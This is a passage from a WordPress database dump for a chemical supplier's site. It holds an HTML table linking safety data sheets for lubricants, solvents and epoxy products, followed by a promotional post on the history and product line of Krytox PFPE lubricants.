MS-550</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/757.pdf">MS-757</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/143XD.pdf">MS-143XD</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/LVP.pdf">LVP</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/834.pdf">EPON RESIN 834</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/555.pdf">MS-555</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/762.pdf">MS-762</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/143XD1.pdf">MS-143XD-1</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/NRT8990.pdf">NRT 8990</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/862.pdf">EPON RESIN 862</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/560.pdf">MS-560</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/767.pdf">MS-767</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/143XD2.pdf">MS-143XD-2</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/NRT8906A.pdf">NRT 8906A</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/872.pdf">EPON RESIN 872</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/580.pdf">MS-580</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/772.pdf">MS-772</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/143XD25.pdf">MS-143XD-2.5</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/NRT8908.pdf">NRT 8908</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/1001F.pdf">EPON RESIN 1001F</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/700.pdf">MS-700</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/777.pdf">MS-777</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/143XD5.pdf">MS-143XD-5</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/NRT8950.pdf">NRT 8950</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/1002F.pdf">EPON RESIN 1002F</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/700.pdf">MS-700M</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/782.pdf">MS-782</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/143XD10.pdf">MS-143XD-10</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/NRT8980.pdf">NRT 8980</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/1004F.pdf">EPON RESIN 1004F</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/720.pdf">MS-720</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/787.pdf">MS-787</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/145W.pdf">MS-145W</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/NRTgrease.pdf">NRT GREASE</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/1007F.pdf">EPON RESIN 1007F</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/720.pdf">MS-720M</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/797.pdf">MS-797</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/145W4.pdf">MS-145W-4</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/PFPEoilsXP.pdf">PFPE OIL W/SOLUBLE ADDITIVE</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/1031.pdf">EPON RESIN 1031</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/720L.pdf">MS-720L</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/110XB.pdf">MS-110XB</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/153BN.pdf">MS-153BN</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/PFPEgreaseXP.pdf">PFPE GREASE SOLUBLE ADDITIVE</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/1050.pdf">EPON RESIN 1050</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/725.pdf">MS-725</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/1010.pdf">MS-1010</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/A0305B.pdf">A0305B</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/PFPEoils.pdf">PFPE OILS</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/1163.pdf">EPON RESIN 1163</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/725.pdf">MS-725M</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/2010.pdf">MS-2010</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/K1206A.pdf">K1206A</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/TS4.pdf">TS4 SEALANT</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/8021.pdf">EPON RESIN 8021</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/730.pdf">MS-730</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/3100MD.pdf">MS-31XXMD</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/Y0717A.pdf">Y0717A</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/VPF.pdf">VACUUM PUMP FLUID</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/8132.pdf">EPON RESIN 8132</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/730.pdf">MS-730M</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/3200MD.pdf">MS-32XXMD</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/NRT960.pdf">Vydax NRT 960</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/VPFXP.pdf">VACUUM PUMP FLUID XP</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/8280.pdf">EPON RESIN 8280</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/730L.pdf">MS-730L</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/XP35.pdf">X-P35</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/RAIPA5.pdf">RA/IPA-5</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/XHT500AF.pdf">XHT-500AF</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/8281.pdf">EPON RESIN 8281</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/738.pdf">MS-738</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/H0805B.pdf">H0805B</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/RAIPA15.pdf">RA/IPA-15</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/XHToils.pdf">XHT-OILS</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/58005.pdf">EPON RESIN 58005</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/738.pdf">MS-738M</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/H1112B.pdf">H1112B</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/RAIPA.pdf">DryFilm RA/IPA</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/XHTAC.pdf">XHT-AC, ACX</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/58034.pdf">EPON RESIN 58034</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/745.pdf">MS-745</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/VertrelSDG.pdf">Vertrel SDG</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/RA.pdf">DryFilm RA</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/XHTBD.pdf">XHT-BD, BDX, BDZ</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/1510.pdf">EPONEX 1510</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/750.pdf">MS-750</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/VertrelSFR.pdf">Vertrel SFR</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/XHTS.pdf">XHT-S, SX, SZ</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/WD510.pdf">EPI-REZ WD-510</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/750.pdf">MS-750M</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/GPL2E.pdf">GPL 2E SERIES</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/3522W60.pdf">EPI-REZ 3522-W-60</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/755.pdf">MS-755</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/fluoroguard.pdf">PCA,PRO,SG</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/5003W55.pdf">EPI-REZ 5003-W-55</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/755.pdf">MS-755M</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/5520W60.pdf">EPI-REZ 5520-W-60</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/755L.pdf">MS-755L</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/5522WY55.pdf">EPI-REZ 5522-WY-55</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/760.pdf">MS-760</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/3015.pdf">EPIKURE 3015</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/760.pdf">MS-760M</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/3046.pdf">EPIKURE 3046</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/765.pdf">MS-765</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/3055.pdf">EPIKURE 3055</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/770.pdf">MS-770</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/3115.pdf">EPIKURE 3115</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/770.pdf">MS-770M</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/3125.pdf">EPIKURE 3125</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/775.pdf">MS-775</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/3140.pdf">EPIKURE 3140</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/775.pdf">MS-775M</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/3155.pdf">EPIKURE 3155</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/780.pdf">MS-780</a></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/3164.pdf">EPIKURE 3164</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/780.pdf">MS-780M</a></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/3223.pdf">EPIKURE 3223</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/795.pdf">MS-795</a></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/3234.pdf">EPIKURE 3234</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/795.pdf">MS-795M</a></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/3245.pdf">EPIKURE 3245</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/110X.pdf">MS-110X</a></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/3253.pdf">EPIKURE 3253</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/120X.pdf">MS-120X</a></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/3270.pdf">EPIKURE 3270</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/120XXP.pdf">MS-120X-XP</a></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/3271.pdf">EPIKURE 3271</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/H0805A.pdf">H0805A</a></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/3274.pdf">EPIKURE 3274</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/J0912A.pdf">J0912A</a></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/3282.pdf">EPIKURE 3282</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/K0725A.pdf">K0725A</a></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/3290.pdf">EPIKURE 3290</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/K1016A.pdf">K1016A</a></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/3295.pdf">EPIKURE 3295</a></td>\r\n</tr>\r\n<tr>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/W.pdf">CURING AGENT W</a></td>\r\n</tr>\r\n<tr>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/K54.pdf">ANCAMINE K54</a></td>\r\n</tr>\r\n<tr>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/K61B.pdf">ANCAMINE K61B</a></td>\r\n</tr>\r\n<tr>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/BDMA.pdf">BDMA</a></td>\r\n</tr>\r\n<tr>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/BF3400.PDF">BF3-400</a></td>\r\n</tr>\r\n<tr>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/DEAPA.pdf">DEAPA</a></td>\r\n</tr>\r\n<tr>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/NMA.pdf">NMA</a></td>\r\n</tr>\r\n<tr>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/V115.pdf">VERSAMID 115</a></td>\r\n</tr>\r\n<tr>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/V125.pdf">VERSAMID 125</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/V140.pdf">VERSAMID 140</a></td>\r\n</tr>\r\n</tbody>\r\n</table>', 'SDS', '', 'inherit', 'closed', 'closed', '', '1842-autosave-v1', '', '', '2016-09-28 13:03:21', '2016-09-28 13:03:21', '', 1842, 'https://www.miller-stephenson.com/1842-autosave-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2053, 2, '2016-09-28 13:15:05', '2016-09-28 13:15:05', 'Discovered in 1959, the polymer that would become known worldwide as Krytox showed remarkable thermal and oxidative stability. Potential uses envisioned then included lubricant for the MACH 3+ turbine engine, hydraulic oil, rocket gear box lubricant, and even gyroscope oil.\r\n\r\nIn 1963, Krytox oil was used in a GE engine test for the supersonic transport aircraft. In 1964, new Krytox perfluoropolyether (PFPE)-based grease formulations were developed jointly with the U.S. Navy and Air Force, resulting in military specification MIL-G-27617, which was developed specifically for Krytox. The first commercial sales of Krytox were for nonflammable lubricants for the Apollo space program in 1965.\r\n\r\nPrior to 1981, the only commercially available Krytox lubricants were aerospace oil and greases. Since then, PFPE-based oils and greases have been adopted across a very wide range of industries and applications. There are PFPE oils and greases for industrial operations, vacuum pump fluids, incidental food contact, automotive uses, reactive gas, and, of course, military applications—to name just a few.\r\n\r\nToday, of course, it’s our well-known trademark for high performance synthetic lubricants used for a variety of applications. Krytox oils are made from only fluorine, carbon, and oxygen—a mixture of compounds collectively known by many names—including PFPE, perfluoroalkylether (PFAE), and perfluoropolyalkylether (PFPAE). These perfluorinated oils and greases deliver high performance, perform at wide temperature ranges, and provide superior quality lubrication under extreme conditions in comparison to hydrocarbon alternatives. And, with a global distribution network and world-class technical service, Krytox is the lubricant of choice for extreme conditions and performance.\r\n\r\nThe use of Chemours unique PTFE thickener provides superior chemical and thermal stability to all Krytox grease product lines. Many greases are also available with additional anti-wear and anti-corrosion additives to further boost performance in critical operations.\r\n\r\nKrytox performance lubricants provide superior performance and extended life as lubricants, sealants, and dielectrics. With exceptional performance and reliability in the toughest conditions—where productivity matters and downtime costs—Krytox can contribute significantly to lowering the cost of doing business.\r\n<table width="1455">\r\n<tbody>\r\n<tr>\r\n<td style="text-align: center;" colspan="3" width="1455"><strong>Krytox Performance Lubricants Product Line</strong></td>\r\n</tr>\r\n<tr>\r\n<td colspan="3"><strong>Krytox for General Purpose Applications</strong></td>\r\n</tr>\r\n<tr>\r\n<td>Krytox GPL 10X Oil / 20X Grease</td>\r\n<td>The GPL 10X oil/20X grease series contains no additives and can be used on components that come in contact with chemicals.</td>\r\n<td>Typical applications include valves or bearings in contact with chemicals, seal barrier fluids, instruments, and oxygen systems.</td>\r\n</tr>\r\n<tr>\r\n<td>Krytox GPL 21X</td>\r\n<td>The GPL 21X series contains molybdenum disulfide for extreme pressure (EP) conditions and should be used for slow speed or heavily loaded applications where there is no danger of the molybdenum disulfide additive reacting with chemicals or causing contamination.</td>\r\n<td>Typical applications include highly loaded gears, CV joints, U-joints, splined shafts, and commercial electrical switches.</td>\r\n</tr>\r\n<tr>\r\n<td>Krytox GPL 22X</td>\r\n<td>The GPL 22X series contains sodium nitrite corrosion/ anti-wear inhibitor and is ideal for corrosive environments where there is no danger of the sodium nitrite additive reacting with chemicals or causing contamination problems.</td>\r\n<td>Typical applications are automotive bearings, sealed pump bearings, electric motor bearings, and generalpurpose bearings.</td>\r\n</tr>\r\n<tr>\r\n<td>Krytox GPL 29X</td>\r\n<td>The GPL 29X greases have EP and anti-corrosion additives and have been formulated for high temperature applications that need both high load carrying capacity and anti-corrosion protection.</td>\r\n<td>Typical applications include slow-speed conveyor bearings that are subjected to vibration, moist conditions, or frequent temperature cycling that could allow condensation and rusting to occur.</td>\r\n</tr>\r\n<tr>\r\n<td>Krytox GPL 2EX</td>\r\n<td>The GPL 2E(X) lubricants are formulated using new anti-rust additives. This grease is similar to the GPL 22X series greases, but contains a non-nitrite anticorrosion additive that is the salt of an organic acid. The new additives are effective at low concentration levels, are environmentally friendly, and do not pose any restrictions on long-term recyclability of the grease.</td>\r\n<td>Typical applications are automotive bearings, sealed pump bearings, electric motor bearings, and generalpurpose bearings.</td>\r\n</tr>\r\n<tr>\r\n<td colspan="3"><strong>Krytox Lubricants for Aerospace Applications</strong></td>\r\n</tr>\r\n<tr>\r\n<td>Krytox 143</td>\r\n<td colspan="2">Krytox 143 series oils are clear, colorless fluorinated synthetic oils that are non-reactive, nonflammable, safe in chemical and oxygen service, and long-lasting.</td>\r\n</tr>\r\n<tr>\r\n<td>Krytox 240</td>\r\n<td colspan="2">Krytox 240 series greases are white, buttery greases with all of the same properties as the 143 series oils that they are made from, but they are in grease form. The 240 AZ, 240 AB, and 240 AC meet MIL-PRF-27617 general specifications. Many of the other 240 series products meet other specifications for individual applications.</td>\r\n</tr>\r\n<tr>\r\n<td>Krytox 250</td>\r\n<td colspan="2">Krytox 250 series EP greases are black greases that contain molybdenum disulfide added as an extreme pressure additive for highly loaded gears and bearings.</td>\r\n</tr>\r\n<tr>\r\n<td>Krytox 283</td>\r\n<td colspan="2">Krytox 283 series anti-corrosion greases are white greases that contain sodium nitrite. These grades provide rust protection at ambient temperatures, corrosion protection at high temperatures, and anti-wear protection.</td>\r\n</tr>\r\n<tr>\r\n<td colspan="3"><strong>Krytox Lubricants for Extended Performance Applications</strong></td>\r\n</tr>\r\n<tr>\r\n<td>Krytox XP 1A series oils/XP 2A series greases</td>\r\n<td colspan="2">The Krytox XP lubricant line offers greases and oils with a soluble additive in the oil. It will not be washed away or left behind with the grease thickener. These new patented additives enhance the performance of Krytox PFPE greases and oils, giving them improved performance properties. Bearings run quieter and wear less, because there are no solid additives to make noise. Lower wear will extend bearing and component life. The anti-corrosion protection of the additive will 